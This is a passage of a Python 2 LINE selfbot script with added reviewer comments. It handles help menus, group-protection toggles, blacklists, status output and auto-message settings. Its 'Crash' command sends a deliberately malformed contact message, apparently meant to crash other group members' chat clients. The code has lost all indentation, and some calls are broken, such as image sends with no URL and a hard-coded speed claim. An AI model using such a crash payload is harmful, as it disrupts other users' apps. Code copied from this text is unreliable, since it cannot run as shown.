if msg.contentMetadata["mid"] in wait["blacklist"]:
kr1.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
kr1.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
# NOTE(review): replies "Done" even though nothing was removed
# (the mid was not blacklisted) — misleading, likely meant
# "Not in Blacklist".
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
# 'contact' mode: echo the shared contact's mid and full profile details.
elif wait['contact'] == True:
msg.contentType = 0
kr1.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = kr1.getContact(msg.contentMetadata["mid"])
try:
cu = kr1.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr1.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = kr1.getContact(msg.contentMetadata["mid"])
try:
cu = kr1.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr1.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
#==========================[WIB]===========================
# Timeline posts (contentType 16): echo the post URL when 'timeline' is on.
elif msg.contentType == 16:
if wait['timeline'] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
kr1.sendText(msg.to,msg.text)
#==========================[WIB]===========================
# Guard: the text-command chain below requires msg.text to be set.
elif msg.text is None:
return
#==========================[WIB]===========================
# Help-menu commands: each sends a pre-built help text defined elsewhere.
elif msg.text in ["help","Help"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpmsg)
# NOTE(review): sendImageWithURL is called without a URL argument here —
# this raises TypeError at runtime; an image URL parameter is missing.
kr1.sendImageWithURL(msg.to)
kr1.sendText(msg.to,"↥↥↥↥↥↪ Owner Bots ↩↥↥↥↥↥")
else:
kr1.sendText(msg.to,helpmsg)
#==========================[WIB]===========================
elif msg.text in ["key",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,keymsg)
else:
kr1.sendText(msg.to,keymsg)
#==========================[WIB]===========================
# NOTE(review): ".." also appears in the "key" trigger above; since this is an
# elif chain, "keypro" can only be reached by its full name.
elif msg.text in ["keypro",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helppro)
else:
kr1.sendText(msg.to,helppro)
#==========================[WIB]===========================
elif msg.text in ["keyself","Oswib1"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpself)
else:
kr1.sendText(msg.to,helpself)
#==========================[WIB]===========================
elif msg.text in ["keygrup","Oswib2"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpgrup)
else:
kr1.sendText(msg.to,helpgrup)
#==========================[WIB]===========================
elif msg.text in ["keyset","Oswib3"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpset)
else:
kr1.sendText(msg.to,helpset)
#==========================[WIB]===========================
elif msg.text in ["keymedia",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helptranslate)
else:
kr1.sendText(msg.to,helptranslate)
#==========================[WIB]===========================
elif msg.text in ["keyrhs","Oswib4"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helprhs)
else:
kr1.sendText(msg.to,helprhs)
#==========================[WIB]===========================
# Speed check: only measures the duration of the first sendText call; the
# reported "Time: 0.04 - 0.06" is a hard-coded claim, not a measurement.
elif msg.text in ["Sp","Speed","speed"]:
#if msg.from_ in admin:
start = time.time()
kr1.sendText(msg.to,"【 ωιϐ τєѕ ѕρєє∂ 】\n🔹️ Type: speed\n🔹️ ૮αℓ૮µℓαƭเɳɠ.............")
elapsed_time = time.time() - start
kr1.sendText(msg.to,"【ωιϐ-ϐοτ ѕρєє∂】\n🔹️ Tipe: Check speed\n🔹️ Time: 0.04 - 0.06 \n🔹️ Speed :%sseconds" % (elapsed_time))
#==========================[WIB]===========================
#==========================[WIB]===========================
elif msg.text in ["Crash"]:
#if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u4a361586c55ac4ef218a0a9b78b2f1b3',"}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr2.sendMessage(msg)
kr2.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["aku","Aku"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["bot","Bot"]:
#if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
kr1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
kr2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kr3.sendMessage(msg)
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Owner Bots ↩↥↥↥↥↥")
#==========================[WIB]===========================
elif "Facebook " in msg.text:
#if msg.from_ in admin:
a = msg.text.replace("facebook ","")
b = urllib.quote(a)
kr1.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
kr1.sendText(msg.to, "https://www.facebook.com" + b)
kr1.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#==========================[WIB]===========================
# "mode on": master switch — turns on every protection flag in `wait`
# (protect, linkprotect, inviteprotect, cancelprotect, QrProtect, MProtection,
# pname, Protectcancel, autoKick, Protectguest, Protectgr), announcing each.
elif msg.text in ["mode on","Mode on"]:
#if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already On")
else:
kr1.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
if wait["QrProtect"] == True:#<==========
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR On")
else:
kr1.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR On")
else:
kr1.sendText(msg.to,"done")
if wait["MProtection"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection On")
else:
kr1.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection On")
else:
kr1.sendText(msg.to,"done")
# Group-name protection: remember the current group name so it can be
# restored if someone changes it.
if msg.to in wait['pname']:
kr1.sendText(msg.to,"TURN ON")
else:
kr1.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = kr1.getGroup(msg.to).name
# NOTE(review): the two sections below differ in shape from the others —
# the `else` appears to hang off the inner lang-check, so when the flag is
# already True and lang != "JP" it is (re)assigned True and "already on"
# is sent; indentation in this paste is lost, so the exact binding of
# these else branches should be confirmed against the original file.
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
if wait["autoKick"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger On")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger On")
else:
kr1.sendText(msg.to,"done")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link On")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link On")
else:
kr1.sendText(msg.to,"done")
#==========================[Kris]===========================
# "mode off": mirror of "mode on" — clears every protection flag and the
# per-group name-lock entry, announcing each change.
elif msg.text in ["mode off","Mode off"]:
#if msg.from_ in admin:
if wait["protect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection already Off")
else:
kr1.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already off")
else:
kr1.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already Off")
else:
kr1.sendText(msg.to,"Protection Qr already Off")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
if wait["QrProtect"] == False:#<===
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["QrProtect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR Off")
else:
kr1.sendText(msg.to,"done")
if wait["MProtection"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection Off")
else:
kr1.sendText(msg.to,"done")
# Drop the group-name lock for this room, if present.
if msg.to in wait['pname']:
kr1.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
kr1.sendText(msg.to,"ALREADY OFF")
# NOTE(review): same ambiguous else-binding as in "mode on" for the two
# sections below — confirm against the original indentation.
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"proтecт cancel oғғ")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect already oғғ")
if wait["autoKick"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick oғғ")
else:
wait["autoKick"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick already oғғ")
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger Off")
else:
kr1.sendText(msg.to,"done")
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link Off")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link Off")
else:
kr1.sendText(msg.to,"done")
#==========================[WIB]===========================
# Individual protection toggles ("... on"/"... off"): each checks the current
# flag, flips it when needed, and replies. The JP/non-JP branches mostly send
# identical text.
elif msg.text in ["contact on","Contact on"]:
#if msg.from_ in admin:
if wait['contact'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait['contact'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text in ["contact off","Contact off"]:
#if msg.from_ in admin:
if wait['contact'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait['contact'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr1.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
#==========================[WIB]===========================
elif msg.text in ["protect on","Protect on"]:
#if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
#==========================[WIB]===========================
elif msg.text in ["tikel on","Tikel on"]:
#if msg.from_ in admin:
if wait['stiker'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker Already On")
else:
kr1.sendText(msg.to,"Stiker Already On")
else:
wait["stiker"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker Already On")
else:
kr1.sendText(msg.to,"Stiker Already On")
#==========================[WIB]===========================
elif msg.text in ["qr on","Qr on"]:
#if msg.from_ in admin:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
#==========================[WIB]===========================
elif msg.text in ["invite on","Invite on"]:
#if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already On")
else:
kr1.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
#==========================[WIB]===========================
elif msg.text in ["cancel on","Cancel on"]:
#if msg.from_ in admin:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
#==========================[WIB]===========================
# More individual toggles: autojoin on/off and the "off" counterparts of the
# protection flags above.
elif msg.text in ["autojoin on","Autojoin on"]:
#if msg.from_ in admin:
if wait['autoJoin'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait['autoJoin'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
#==========================[WIB]===========================
elif msg.text in ["autojoin off","Autojoin off"]:
#if msg.from_ in admin:
if wait['autoJoin'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait['autoJoin'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["protect off","Protect off"]:
#if msg.from_ in admin:
if wait["protect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection already Off")
else:
kr1.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["tikel off","Tikel off"]:
#if msg.from_ in admin:
if wait["stiker"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker already Off")
else:
kr1.sendText(msg.to,"Stiker already Off")
else:
wait["stiker"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Stiker ѕєт тσ σff")
else:
kr1.sendText(msg.to,"Stiker αℓяєα∂у σff")
#==========================[WIB]===========================
elif msg.text in ["qr off","Qr off"]:
#if msg.from_ in admin:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already off")
else:
kr1.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already Off")
else:
kr1.sendText(msg.to,"Protection Qr already Off")
#==========================[WIB]===========================
# NOTE(review): trigger is "invit off" (missing final 'e') — inconsistent
# with the "invite on" trigger above.
elif msg.text in ["invit off","Invit off"]:
#if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already Off")
else:
kr1.sendText(msg.to,"Protection Invite already Off")
#==========================[WIB]===========================
elif msg.text in ["cancel off","Cancel off"]:
#if msg.from_ in admin:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Cancel already Off")
else:
kr1.sendText(msg.to,"Protection Cancel already Off")
#==========================[WIB]===========================
# "Grup cancel:<n|off>": configure auto-rejection of group invites.
elif "Grup cancel:" in msg.text:
#if msg.from_ in admin:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait['autoCancel']["on"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
kr1.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
# NOTE(review): `num` is parsed (validating the input via the
# surrounding try/except) but never stored —
# wait['autoCancel']["members"] is not updated here.
num = int(strnum)
wait['autoCancel']["on"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
kr1.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Nilai tidak benar")
else:
kr1.sendText(msg.to,"Weird value")
#==========================[WIB]===========================
# Auto-leave-room toggle.
elif msg.text in ["autoleave on","Autoleave on"]:
#if msg.from_ in admin:
if wait['leaveRoom'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to on")
else:
kr1.sendText(msg.to,"Auto Leave room already on")
else:
wait['leaveRoom'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to on")
else:
kr1.sendText(msg.to,"Auto Leave room already on")
elif msg.text in ["autoleave off","Autoleave off"]:
#if msg.from_ in admin:
if wait['leaveRoom'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to off")
else:
kr1.sendText(msg.to,"Auto Leave room already off")
else:
wait['leaveRoom'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto Leave room set to off")
else:
kr1.sendText(msg.to,"Auto Leave room already off")
#==========================[WIB]===========================
# Timeline-share toggle ('timeline' flag, used by the contentType 16 branch).
elif msg.text in ["share on","share on"]:
#if msg.from_ in admin:
if wait['timeline'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to on")
else:
kr1.sendText(msg.to,"Share already on")
else:
wait['timeline'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to on")
else:
kr1.sendText(msg.to,"Share already on")
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
# NOTE(review): sendImageWithURL called without the URL argument —
# TypeError at runtime.
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["share off","Share off"]:
#if msg.from_ in admin:
if wait['timeline'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to off")
else:
kr1.sendText(msg.to,"Share already off")
else:
wait['timeline'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Share set to off")
else:
kr1.sendText(msg.to,"Share already off")
#==========================[WIB]===========================
# "status": render all toggle flags as a framed checklist, then send the
# creator's contact card.
elif msg.text in ["status","Status"]:
#if msg.from_ in admin:
md = """╔═════════════\n"""
if wait['contact'] == True: md+="╠[➣Contact:on [✅]\n"
else: md+="╠[➣Contact:off [❌]\n"
if wait['autoJoin'] == True: md+="╠[➣Auto Join:on [✅]\n"
else: md +="╠[➣Auto Join:off [❌]\n"
if wait['autoCancel']["on"] == True:md+="╠[➣Auto cancel:" + str(wait['autoCancel']["members"]) + "[✅]\n"
else: md+= "╠[➣Group cancel:off [❌]\n"
if wait['leaveRoom'] == True: md+="╠[➣Auto leave:on [✅]\n"
else: md+="╠[➣Auto leave:off [❌]\n"
if wait['timeline'] == True: md+="╠[➣Share:on [✅]\n"
else:md+="╠[➣Share:off [❌]\n"
if wait['autoAdd'] == True: md+="╠[➣Auto add:on [✅]\n"
else:md+="╠[➣Auto add:off [❌]\n"
if wait["protect"] == True: md+="╠[➣Protect:on [✅]\n"
else:md+="╠[➣Protect:off [❌]\n"
if wait["linkprotect"] == True: md+="╠[➣Link Protect:on [✅]\n"
else:md+="╠[➣Link Protect:off [❌]\n"
if wait["inviteprotect"] == True: md+="╠[➣Invitation Protect:on [✅]\n"
else:md+="╠[➣Invitation Protect:off [❌]\n"
if wait["cancelprotect"] == True: md+="╠[➣Cancel Protect:on [✅]\n"
else:md+="╠[➣Cancel Protect:off [❌]\n╚═════════════"
kr1.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
# "creator": send the creator's contact card plus a caption.
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
kr1.sendText(msg.to,'❂➣ Creator yang manis kalem ')
#==========================[WIB]===========================
# Auto-add toggle plus the auto-message / auto-comment configuration commands.
elif msg.text in ["autoadd on","Autoadd on"]:
#if msg.from_ in admin:
if wait['autoAdd'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to on")
else:
kr1.sendText(msg.to,"Auto add already on")
else:
wait['autoAdd'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to on")
else:
kr1.sendText(msg.to,"Auto add already on")
elif msg.text in ["autoadd off","autoadd off"]:
if msg.from_ in admin:
if wait['autoAdd'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to off")
else:
kr1.sendText(msg.to,"Auto add already off")
else:
wait['autoAdd'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Auto add set to off")
else:
kr1.sendText(msg.to,"Auto add already off")
#==========================[WIB]===========================
# "Pesan set:<text>": store the auto-add greeting message.
elif "Pesan set:" in msg.text:
if msg.from_ in admin:
wait['message'] = msg.text.replace("Pesan set:","")
kr1.sendText(msg.to,"We changed the message")
#==========================[WIB]===========================
elif msg.text in ["pesan cek","Pesan cek"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait['message'])
else:
kr1.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait['message'])
#==========================[WIB]===========================
# "Coment Set:<text>": store the auto-comment text (rejects blank input).
elif "Coment Set:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Coment Set:","")
if c in [""," ","\n",None]:
kr1.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
kr1.sendText(msg.to,"Ini telah diubah\n\n" + c)
#==========================[WIB]===========================
elif msg.text in ["Comment on","comment on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Aku berada di")
else:
kr1.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Comment Actived")
else:
kr1.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Comment off","comment off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Hal ini sudah off")
else:
kr1.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Off")
else:
kr1.sendText(msg.to,"To turn off")
#==========================[WIB]===========================
# Comment blacklist management: arm the wblack/dblack flags (consumed by the
# contact-card branch earlier) or list current entries.
elif msg.text in ["Com","Comment"]:
if msg.from_ in admin:
kr1.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
if msg.from_ in admin:
wait["wblack"] = True
kr1.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
#if msg.from_ in admin:
wait["dblack"] = True
kr1.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
#if msg.from_ in admin:
if wait["commentBlack"] == {}:
kr1.sendText(msg.to,"Nothing in the blacklist")
else:
kr1.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +kr1.getContact(mi_d).displayName + "\n"
kr1.sendText(msg.to,mc)
#==========================[WIB]===========================
# Clock-in-name feature: append the current HH:MM to the profile display name.
elif msg.text in ["jam on","Jam on"]:
#if msg.from_ in admin:
if wait["clock"] == True:
kr1.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr1.getProfile()
profile.displayName = wait["cName"] + nowT
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Jam set on")
elif msg.text in ["jam off","Jam off"]:
#if msg.from_ in admin:
if wait["clock"] == False:
kr1.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
kr1.sendText(msg.to,"Jam set off")
# "Jam say:<name>": set the base display name used before the clock suffix.
elif "Jam say:" in msg.text:
if msg.from_ in admin:
n = msg.text.replace("Jam say:","")
# NOTE: `n.decode("utf-8")` is Python-2-only (str -> unicode) — counts
# characters rather than bytes for the 30-char limit.
if len(n.decode("utf-8")) > 30:
kr1.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
